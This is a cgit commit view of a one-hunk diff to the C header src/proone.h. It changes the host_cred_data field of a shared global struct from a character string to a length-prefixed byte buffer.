aboutsummaryrefslogtreecommitdiff
path: root/src/proone.h
diff options
context:
space:
mode:
Diffstat (limited to 'src/proone.h')
-rw-r--r--src/proone.h3
1 files changed, 2 insertions, 1 deletions
diff --git a/src/proone.h b/src/proone.h
index 3906ba1..cbd1cd9 100644
--- a/src/proone.h
+++ b/src/proone.h
@@ -68,7 +68,8 @@ struct prne_shared_global {
// null-terminated name of new binary
char ny_bin_path[256];
char ny_bin_args[1024];
- char host_cred_data[256];
+ size_t host_cred_len;
+ uint8_t host_cred_data[255];
};